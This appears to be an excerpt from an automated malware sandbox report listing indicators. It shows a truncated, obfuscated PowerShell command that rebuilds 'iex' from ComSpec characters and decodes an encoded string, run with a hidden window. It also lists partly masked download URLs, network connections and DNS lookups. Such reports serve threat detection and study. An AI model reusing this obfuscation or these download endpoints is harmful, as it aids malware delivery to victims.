Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $EnV:ComSPEc[4,15,25]-JoiN'') ( -JOIN ((46 , 80 , 90 ,105 , 107, 73,42, 55,42 , 100, 111,125, 39, 101,104, 96, 111, 105, 126,42 , 120 ,107,100 , 110, 101, 103, 49,46 , 92 ,72,93 ,95, 90 ,10...
- 'tr##tel.eu':443
- 'th#####ralbaptist.com':80
- 'ho####ight.com.br':80
- 'ru##s.lt':80
- 'ru##s.lt':443
- 'bu##.com':80
- http://th#####ralbaptist.com/pMI9u5l/
- http://ho####ight.com.br/6ROEQfpdJJ/
- http://ru##s.lt/thbcIeIjA/
- http://bu##.com/openx/www/spqRlLMl/
- 'tr##tel.eu':443
- 'ru##s.lt':443
- DNS ASK tr##tel.eu
- DNS ASK th#####ralbaptist.com
- DNS ASK ho####ight.com.br
- DNS ASK ru##s.lt
- DNS ASK bu##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $EnV:ComSPEc[4,15,25]-JoiN'') ( -JOIN ((46 , 80 , 90 ,105 , 107, 73,42, 55,42 , 100, 111,125, 39, 101,104, 96, 111, 105, 126,42 , 120 ,107,100 , 110, 101, 103, 49,46 , 92 ,72,93 ,95, 90 ,10...' (with hidden window)